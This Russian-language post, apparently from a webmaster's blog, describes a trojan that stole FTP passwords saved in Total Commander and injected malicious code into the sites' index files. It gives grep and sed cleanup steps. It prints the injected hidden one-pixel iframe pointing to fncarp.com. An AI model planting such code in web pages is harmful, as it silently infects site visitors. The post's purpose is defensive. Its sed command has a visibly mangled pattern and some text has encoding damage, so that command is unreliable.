Ода о трояне, заразившем много сайтов
Поговорить в этом топике хочется, прежде всего о беспечности, с которой мы полагаемся на хранение приватных данных.
Так, по собственной же глупости, словил трояна, который используя, опять же забитые мною по глупости пароли на ftp в TotalCommander-е, записал в индексные файлы моих сайтов вредоносный код.
Так вот речь пойдет о том, как надо хранить свои данные и как от подобных неприятностей избавиться.
Во-первых, если Вы схватили такую гадость - поменяйте пароли на ftp, новые НЕ забивайте в тоталкоммандер или какой-либо другой
ftp_клиент с незашифрованным хранением паролей, т.к. троян их из программ этих и берет.
если у вас есть доступ к серверу по ssh, почистить будет проще.
Вроде прописывается эта дрянь только в index с любым рас�?ирением, но на всякий случай, все луч�?е проверить.
Предположим, что код, добавленный трояном имеет следующий вид:
<iframe width="1" height="1" src="http://fncarp.com/ind.php" />
Добавляется такой код в php-файлах после закрывающего
?>В html после
Теперь делаем резервную копию всех файлов своего сайта.tar -zcvf backup.tgz .
Ищем, только ли в index-ах у нас этот код:
grep -r "http://fncarp.com/ind.php" *
если только в индексах, то ищите этот кусок и автоматом же заменяете его на пустое значение с помощью такого shell-скрипта:
for i in `find . -name index.*`; do cp -p $i $i.old; cat $i.old | sed -e "s|<iframe width="1" height="1" src="http://www.takca.com/%5C%22http://fncarp.com/ind.php%5C%22" />| |g" > $i; done
P.S.
это все в одну строку должно быть!
если в каких-то еще файлах есть, то
`find . -type f`
сделайте. Так он все файлы просмотрит.
если ssh нет и сайт большой, сочувствую, хотя, по идее, можно скачать бэкап на локальный комп и в Dreamweaver использовать функцию
найти и заменить в файлах, если наглядную инструкцию надо сделать по действиям в Dreamweaver, пишите в камменты.